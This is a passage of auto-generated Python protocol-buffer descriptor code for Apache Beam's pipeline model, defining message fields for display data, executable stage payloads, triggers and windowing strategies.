enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12029,
serialized_end=12099,
)
_DISPLAYDATA_ITEM = _descriptor.Descriptor(
name='Item',
full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item.id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item.type', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item.value', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='short_value', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item.short_value', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='label', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item.label', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='link_url', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Item.link_url', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12102,
serialized_end=12364,
)
_DISPLAYDATA_TYPE = _descriptor.Descriptor(
name='Type',
full_name='org.apache.beam.model.pipeline.v1.DisplayData.Type',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_DISPLAYDATA_TYPE_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12366,
serialized_end=12491,
)
_DISPLAYDATA = _descriptor.Descriptor(
name='DisplayData',
full_name='org.apache.beam.model.pipeline.v1.DisplayData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='items', full_name='org.apache.beam.model.pipeline.v1.DisplayData.items', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_DISPLAYDATA_IDENTIFIER, _DISPLAYDATA_ITEM, _DISPLAYDATA_TYPE, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11946,
serialized_end=12491,
)
_MESSAGEWITHCOMPONENTS = _descriptor.Descriptor(
name='MessageWithComponents',
full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='components', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.components', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='coder', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.coder', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='combine_payload', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.combine_payload', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sdk_function_spec', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.sdk_function_spec', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='par_do_payload', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.par_do_payload', index=4,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ptransform', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.ptransform', index=5,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pcollection', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.pcollection', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='read_payload', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.read_payload', index=7,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='side_input', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.side_input', index=8,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='window_into_payload', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.window_into_payload', index=9,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='windowing_strategy', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.windowing_strategy', index=10,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='function_spec', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.function_spec', index=11,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='root', full_name='org.apache.beam.model.pipeline.v1.MessageWithComponents.root',
index=0, containing_type=None, fields=[]),
],
serialized_start=12494,
serialized_end=13408,
)
_EXECUTABLESTAGEPAYLOAD_SIDEINPUTID = _descriptor.Descriptor(
name='SideInputId',
full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.SideInputId',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transform_id', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.SideInputId.transform_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='local_name', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.SideInputId.local_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=13892,
serialized_end=13947,
)
_EXECUTABLESTAGEPAYLOAD_USERSTATEID = _descriptor.Descriptor(
name='UserStateId',
full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.UserStateId',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transform_id', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.UserStateId.transform_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='local_name', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.UserStateId.local_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=13949,
serialized_end=14004,
)
_EXECUTABLESTAGEPAYLOAD_TIMERID = _descriptor.Descriptor(
name='TimerId',
full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.TimerId',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transform_id', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.TimerId.transform_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='local_name', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.TimerId.local_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=14006,
serialized_end=14057,
)
_EXECUTABLESTAGEPAYLOAD = _descriptor.Descriptor(
name='ExecutableStagePayload',
full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='environment', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.environment', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='input', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.input', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='side_inputs', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.side_inputs', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='transforms', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.transforms', index=3,
number=4, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='outputs', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.outputs', index=4,
number=5, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='components', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.components', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='user_states', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.user_states', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timers', full_name='org.apache.beam.model.pipeline.v1.ExecutableStagePayload.timers', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_EXECUTABLESTAGEPAYLOAD_SIDEINPUTID, _EXECUTABLESTAGEPAYLOAD_USERSTATEID, _EXECUTABLESTAGEPAYLOAD_TIMERID, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=13411,
serialized_end=14057,
)
_BEAMCONSTANTS_CONSTANTS.containing_type = _BEAMCONSTANTS
_COMPONENTS_TRANSFORMSENTRY.fields_by_name['value'].message_type = _PTRANSFORM
_COMPONENTS_TRANSFORMSENTRY.containing_type = _COMPONENTS
_COMPONENTS_PCOLLECTIONSENTRY.fields_by_name['value'].message_type = _PCOLLECTION
_COMPONENTS_PCOLLECTIONSENTRY.containing_type = _COMPONENTS
_COMPONENTS_WINDOWINGSTRATEGIESENTRY.fields_by_name['value'].message_type = _WINDOWINGSTRATEGY
_COMPONENTS_WINDOWINGSTRATEGIESENTRY.containing_type = _COMPONENTS
_COMPONENTS_CODERSENTRY.fields_by_name['value'].message_type = _CODER
_COMPONENTS_CODERSENTRY.containing_type = _COMPONENTS
_COMPONENTS_ENVIRONMENTSENTRY.fields_by_name['value'].message_type = _ENVIRONMENT
_COMPONENTS_ENVIRONMENTSENTRY.containing_type = _COMPONENTS
_COMPONENTS.fields_by_name['transforms'].message_type = _COMPONENTS_TRANSFORMSENTRY
_COMPONENTS.fields_by_name['pcollections'].message_type = _COMPONENTS_PCOLLECTIONSENTRY
_COMPONENTS.fields_by_name['windowing_strategies'].message_type = _COMPONENTS_WINDOWINGSTRATEGIESENTRY
_COMPONENTS.fields_by_name['coders'].message_type = _COMPONENTS_CODERSENTRY
_COMPONENTS.fields_by_name['environments'].message_type = _COMPONENTS_ENVIRONMENTSENTRY
_PIPELINE.fields_by_name['components'].message_type = _COMPONENTS
_PIPELINE.fields_by_name['display_data'].message_type = _DISPLAYDATA
_PTRANSFORM_INPUTSENTRY.containing_type = _PTRANSFORM
_PTRANSFORM_OUTPUTSENTRY.containing_type = _PTRANSFORM
_PTRANSFORM.fields_by_name['spec'].message_type = _FUNCTIONSPEC
_PTRANSFORM.fields_by_name['inputs'].message_type = _PTRANSFORM_INPUTSENTRY
_PTRANSFORM.fields_by_name['outputs'].message_type = _PTRANSFORM_OUTPUTSENTRY
_PTRANSFORM.fields_by_name['display_data'].message_type = _DISPLAYDATA
_STANDARDPTRANSFORMS_PRIMITIVES.containing_type = _STANDARDPTRANSFORMS
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES.containing_type = _STANDARDPTRANSFORMS
_STANDARDPTRANSFORMS_COMPOSITES.containing_type = _STANDARDPTRANSFORMS
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.containing_type = _STANDARDPTRANSFORMS
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.containing_type = _STANDARDPTRANSFORMS
_STANDARDSIDEINPUTTYPES_ENUM.containing_type = _STANDARDSIDEINPUTTYPES
_PCOLLECTION.fields_by_name['is_bounded'].enum_type = _ISBOUNDED_ENUM
_PCOLLECTION.fields_by_name['display_data'].message_type = _DISPLAYDATA
_PARDOPAYLOAD_SIDEINPUTSENTRY.fields_by_name['value'].message_type = _SIDEINPUT
_PARDOPAYLOAD_SIDEINPUTSENTRY.containing_type = _PARDOPAYLOAD
_PARDOPAYLOAD_STATESPECSENTRY.fields_by_name['value'].message_type = _STATESPEC
_PARDOPAYLOAD_STATESPECSENTRY.containing_type = _PARDOPAYLOAD
_PARDOPAYLOAD_TIMERSPECSENTRY.fields_by_name['value'].message_type = _TIMERSPEC
_PARDOPAYLOAD_TIMERSPECSENTRY.containing_type = _PARDOPAYLOAD
_PARDOPAYLOAD.fields_by_name['do_fn'].message_type = _SDKFUNCTIONSPEC
_PARDOPAYLOAD.fields_by_name['parameters'].message_type = _PARAMETER
_PARDOPAYLOAD.fields_by_name['side_inputs'].message_type = _PARDOPAYLOAD_SIDEINPUTSENTRY
_PARDOPAYLOAD.fields_by_name['state_specs'].message_type = _PARDOPAYLOAD_STATESPECSENTRY
_PARDOPAYLOAD.fields_by_name['timer_specs'].message_type = _PARDOPAYLOAD_TIMERSPECSENTRY
_PARAMETER_TYPE.containing_type = _PARAMETER
_PARAMETER_TYPE_ENUM.containing_type = _PARAMETER_TYPE
_PARAMETER.fields_by_name['type'].enum_type = _PARAMETER_TYPE_ENUM
_STATESPEC.fields_by_name['value_spec'].message_type = _VALUESTATESPEC
_STATESPEC.fields_by_name['bag_spec'].message_type = _BAGSTATESPEC
_STATESPEC.fields_by_name['combining_spec'].message_type = _COMBININGSTATESPEC
_STATESPEC.fields_by_name['map_spec'].message_type = _MAPSTATESPEC
_STATESPEC.fields_by_name['set_spec'].message_type = _SETSTATESPEC
_STATESPEC.oneofs_by_name['spec'].fields.append(
_STATESPEC.fields_by_name['value_spec'])
_STATESPEC.fields_by_name['value_spec'].containing_oneof = _STATESPEC.oneofs_by_name['spec']
_STATESPEC.oneofs_by_name['spec'].fields.append(
_STATESPEC.fields_by_name['bag_spec'])
_STATESPEC.fields_by_name['bag_spec'].containing_oneof = _STATESPEC.oneofs_by_name['spec']
_STATESPEC.oneofs_by_name['spec'].fields.append(
_STATESPEC.fields_by_name['combining_spec'])
_STATESPEC.fields_by_name['combining_spec'].containing_oneof = _STATESPEC.oneofs_by_name['spec']
_STATESPEC.oneofs_by_name['spec'].fields.append(
_STATESPEC.fields_by_name['map_spec'])
_STATESPEC.fields_by_name['map_spec'].containing_oneof = _STATESPEC.oneofs_by_name['spec']
_STATESPEC.oneofs_by_name['spec'].fields.append(
_STATESPEC.fields_by_name['set_spec'])
_STATESPEC.fields_by_name['set_spec'].containing_oneof = _STATESPEC.oneofs_by_name['spec']
_COMBININGSTATESPEC.fields_by_name['combine_fn'].message_type = _SDKFUNCTIONSPEC
_TIMERSPEC.fields_by_name['time_domain'].enum_type = _TIMEDOMAIN_ENUM
_ISBOUNDED_ENUM.containing_type = _ISBOUNDED
_READPAYLOAD.fields_by_name['source'].message_type = _SDKFUNCTIONSPEC
_READPAYLOAD.fields_by_name['is_bounded'].enum_type = _ISBOUNDED_ENUM
_WINDOWINTOPAYLOAD.fields_by_name['window_fn'].message_type = _SDKFUNCTIONSPEC
_COMBINEPAYLOAD.fields_by_name['combine_fn'].message_type = _SDKFUNCTIONSPEC
_TESTSTREAMPAYLOAD_EVENT_ADVANCEWATERMARK.containing_type = _TESTSTREAMPAYLOAD_EVENT
_TESTSTREAMPAYLOAD_EVENT_ADVANCEPROCESSINGTIME.containing_type = _TESTSTREAMPAYLOAD_EVENT
_TESTSTREAMPAYLOAD_EVENT_ADDELEMENTS.fields_by_name['elements'].message_type = _TESTSTREAMPAYLOAD_TIMESTAMPEDELEMENT
_TESTSTREAMPAYLOAD_EVENT_ADDELEMENTS.containing_type = _TESTSTREAMPAYLOAD_EVENT
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['watermark_event'].message_type = _TESTSTREAMPAYLOAD_EVENT_ADVANCEWATERMARK
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['processing_time_event'].message_type = _TESTSTREAMPAYLOAD_EVENT_ADVANCEPROCESSINGTIME
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['element_event'].message_type = _TESTSTREAMPAYLOAD_EVENT_ADDELEMENTS
_TESTSTREAMPAYLOAD_EVENT.containing_type = _TESTSTREAMPAYLOAD
_TESTSTREAMPAYLOAD_EVENT.oneofs_by_name['event'].fields.append(
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['watermark_event'])
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['watermark_event'].containing_oneof = _TESTSTREAMPAYLOAD_EVENT.oneofs_by_name['event']
_TESTSTREAMPAYLOAD_EVENT.oneofs_by_name['event'].fields.append(
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['processing_time_event'])
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['processing_time_event'].containing_oneof = _TESTSTREAMPAYLOAD_EVENT.oneofs_by_name['event']
_TESTSTREAMPAYLOAD_EVENT.oneofs_by_name['event'].fields.append(
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['element_event'])
_TESTSTREAMPAYLOAD_EVENT.fields_by_name['element_event'].containing_oneof = _TESTSTREAMPAYLOAD_EVENT.oneofs_by_name['event']
_TESTSTREAMPAYLOAD_TIMESTAMPEDELEMENT.containing_type = _TESTSTREAMPAYLOAD
_TESTSTREAMPAYLOAD.fields_by_name['events'].message_type = _TESTSTREAMPAYLOAD_EVENT
_WRITEFILESPAYLOAD_SIDEINPUTSENTRY.fields_by_name['value'].message_type = _SIDEINPUT
_WRITEFILESPAYLOAD_SIDEINPUTSENTRY.containing_type = _WRITEFILESPAYLOAD
_WRITEFILESPAYLOAD.fields_by_name['sink'].message_type = _SDKFUNCTIONSPEC
_WRITEFILESPAYLOAD.fields_by_name['format_function'].message_type = _SDKFUNCTIONSPEC
_WRITEFILESPAYLOAD.fields_by_name['side_inputs'].message_type = _WRITEFILESPAYLOAD_SIDEINPUTSENTRY
_CODER.fields_by_name['spec'].message_type = _SDKFUNCTIONSPEC
_STANDARDCODERS_ENUM.containing_type = _STANDARDCODERS
_WINDOWINGSTRATEGY.fields_by_name['window_fn'].message_type = _SDKFUNCTIONSPEC
_WINDOWINGSTRATEGY.fields_by_name['merge_status'].enum_type = _MERGESTATUS_ENUM
_WINDOWINGSTRATEGY.fields_by_name['trigger'].message_type = _TRIGGER
_WINDOWINGSTRATEGY.fields_by_name['accumulation_mode'].enum_type = _ACCUMULATIONMODE_ENUM
_WINDOWINGSTRATEGY.fields_by_name['output_time'].enum_type = _OUTPUTTIME_ENUM
_WINDOWINGSTRATEGY.fields_by_name['closing_behavior'].enum_type = _CLOSINGBEHAVIOR_ENUM
_WINDOWINGSTRATEGY.fields_by_name['OnTimeBehavior'].enum_type = _ONTIMEBEHAVIOR_ENUM
_MERGESTATUS_ENUM.containing_type = _MERGESTATUS
_ACCUMULATIONMODE_ENUM.containing_type = _ACCUMULATIONMODE
_CLOSINGBEHAVIOR_ENUM.containing_type = _CLOSINGBEHAVIOR
_ONTIMEBEHAVIOR_ENUM.containing_type = _ONTIMEBEHAVIOR
_OUTPUTTIME_ENUM.containing_type = _OUTPUTTIME
_TIMEDOMAIN_ENUM.containing_type = _TIMEDOMAIN
_TRIGGER_AFTERALL.fields_by_name['subtriggers'].message_type = _TRIGGER
_TRIGGER_AFTERALL.containing_type = _TRIGGER
_TRIGGER_AFTERANY.fields_by_name['subtriggers'].message_type = _TRIGGER
_TRIGGER_AFTERANY.containing_type = _TRIGGER
_TRIGGER_AFTEREACH.fields_by_name['subtriggers'].message_type = _TRIGGER
_TRIGGER_AFTEREACH.containing_type = _TRIGGER
_TRIGGER_AFTERENDOFWINDOW.fields_by_name['early_firings'].message_type = _TRIGGER
_TRIGGER_AFTERENDOFWINDOW.fields_by_name['late_firings'].message_type = _TRIGGER
_TRIGGER_AFTERENDOFWINDOW.containing_type = _TRIGGER
_TRIGGER_AFTERPROCESSINGTIME.fields_by_name['timestamp_transforms'].message_type = _TIMESTAMPTRANSFORM
_TRIGGER_AFTERPROCESSINGTIME.containing_type = _TRIGGER
_TRIGGER_AFTERSYNCHRONIZEDPROCESSINGTIME.containing_type = _TRIGGER
_TRIGGER_DEFAULT.containing_type = _TRIGGER
_TRIGGER_ELEMENTCOUNT.containing_type = _TRIGGER
_TRIGGER_NEVER.containing_type = _TRIGGER
_TRIGGER_ALWAYS.containing_type = _TRIGGER
_TRIGGER_ORFINALLY.fields_by_name['main'].message_type = _TRIGGER
_TRIGGER_ORFINALLY.fields_by_name['finally'].message_type = _TRIGGER
_TRIGGER_ORFINALLY.containing_type = _TRIGGER
_TRIGGER_REPEAT.fields_by_name['subtrigger'].message_type = _TRIGGER
_TRIGGER_REPEAT.containing_type = _TRIGGER
_TRIGGER.fields_by_name['after_all'].message_type = _TRIGGER_AFTERALL
_TRIGGER.fields_by_name['after_any'].message_type = _TRIGGER_AFTERANY
_TRIGGER.fields_by_name['after_each'].message_type = _TRIGGER_AFTEREACH
_TRIGGER.fields_by_name['after_end_of_window'].message_type = _TRIGGER_AFTERENDOFWINDOW
_TRIGGER.fields_by_name['after_processing_time'].message_type = _TRIGGER_AFTERPROCESSINGTIME
_TRIGGER.fields_by_name['after_synchronized_processing_time'].message_type = _TRIGGER_AFTERSYNCHRONIZEDPROCESSINGTIME
_TRIGGER.fields_by_name['always'].message_type = _TRIGGER_ALWAYS
_TRIGGER.fields_by_name['default'].message_type = _TRIGGER_DEFAULT
_TRIGGER.fields_by_name['element_count'].message_type = _TRIGGER_ELEMENTCOUNT
_TRIGGER.fields_by_name['never'].message_type = _TRIGGER_NEVER
_TRIGGER.fields_by_name['or_finally'].message_type = _TRIGGER_ORFINALLY
_TRIGGER.fields_by_name['repeat'].message_type = _TRIGGER_REPEAT
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['after_all'])
_TRIGGER.fields_by_name['after_all'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['after_any'])
_TRIGGER.fields_by_name['after_any'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['after_each'])
_TRIGGER.fields_by_name['after_each'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['after_end_of_window'])
_TRIGGER.fields_by_name['after_end_of_window'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['after_processing_time'])
_TRIGGER.fields_by_name['after_processing_time'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['after_synchronized_processing_time'])
_TRIGGER.fields_by_name['after_synchronized_processing_time'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['always'])
_TRIGGER.fields_by_name['always'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['default'])
_TRIGGER.fields_by_name['default'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['element_count'])
_TRIGGER.fields_by_name['element_count'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['never'])
_TRIGGER.fields_by_name['never'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['or_finally'])
_TRIGGER.fields_by_name['or_finally'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['repeat'])
_TRIGGER.fields_by_name['repeat'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TIMESTAMPTRANSFORM_DELAY.containing_type = _TIMESTAMPTRANSFORM
_TIMESTAMPTRANSFORM_ALIGNTO.containing_type = _TIMESTAMPTRANSFORM
_TIMESTAMPTRANSFORM.fields_by_name['delay'].message_type = _TIMESTAMPTRANSFORM_DELAY
_TIMESTAMPTRANSFORM.fields_by_name['align_to'].message_type = _TIMESTAMPTRANSFORM_ALIGNTO
_TIMESTAMPTRANSFORM.oneofs_by_name['timestamp_transform'].fields.append(
_TIMESTAMPTRANSFORM.fields_by_name['delay'])
_TIMESTAMPTRANSFORM.fields_by_name['delay'].containing_oneof = _TIMESTAMPTRANSFORM.oneofs_by_name['timestamp_transform']
_TIMESTAMPTRANSFORM.oneofs_by_name['timestamp_transform'].fields.append(
_TIMESTAMPTRANSFORM.fields_by_name['align_to'])
_TIMESTAMPTRANSFORM.fields_by_name['align_to'].containing_oneof = _TIMESTAMPTRANSFORM.oneofs_by_name['timestamp_transform']
_SIDEINPUT.fields_by_name['access_pattern'].message_type = _FUNCTIONSPEC
_SIDEINPUT.fields_by_name['view_fn'].message_type = _SDKFUNCTIONSPEC
_SIDEINPUT.fields_by_name['window_mapping_fn'].message_type = _SDKFUNCTIONSPEC
_STANDARDENVIRONMENTS_ENVIRONMENTS.containing_type = _STANDARDENVIRONMENTS
_PROCESSPAYLOAD_ENVENTRY.containing_type = _PROCESSPAYLOAD
_PROCESSPAYLOAD.fields_by_name['env'].message_type = _PROCESSPAYLOAD_ENVENTRY
